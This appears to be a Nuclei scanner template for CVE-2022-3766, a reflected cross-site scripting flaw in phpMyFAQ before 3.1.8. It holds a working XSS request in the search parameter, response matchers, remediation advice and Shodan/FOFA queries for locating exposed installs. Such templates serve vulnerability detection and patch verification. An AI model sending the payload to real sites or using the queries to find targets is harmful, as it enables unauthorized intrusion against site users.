phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
PoC代码[已公开]
id: CVE-2022-3766
info:
name: phpMyFAQ < 3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
impact: |
An attacker can Execute arbitrary JavaScript in victim's browser context
remediation: |
Upgrade phpMyFAQ to version 3.1.8 or later
reference:
- https://huntr.dev/bounties/d9666520-4ff5-43bb-aacf-50c8e5570983
- https://github.com/thorsten/phpMyFAQ/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d
- https://nvd.nist.gov/vuln/detail/CVE-2022-3766
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3766
cwe-id: CWE-79
epss-score: 0.34649
epss-percentile: 0.96889
cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
fofa-query: body="phpmyfaq"
tags: cve,cve2022,phpmyfaq,xss
http:
- method: GET
path:
- "{{BaseURL}}/index.php?search=1af%22+onclick%3D'alert(document.domain)'"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "value=\"1af\" onclick='alert(document.domain)'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022056ff7f7f6d251e8f76c3b740779a05aca76e6f53c2d96206779f2cfb0f73398302207e53836a615b4e32f583dd3260545b8b6ec4c153eb12735c40226f8a097b01ea:922c64590222798bb761d5b6d8e72950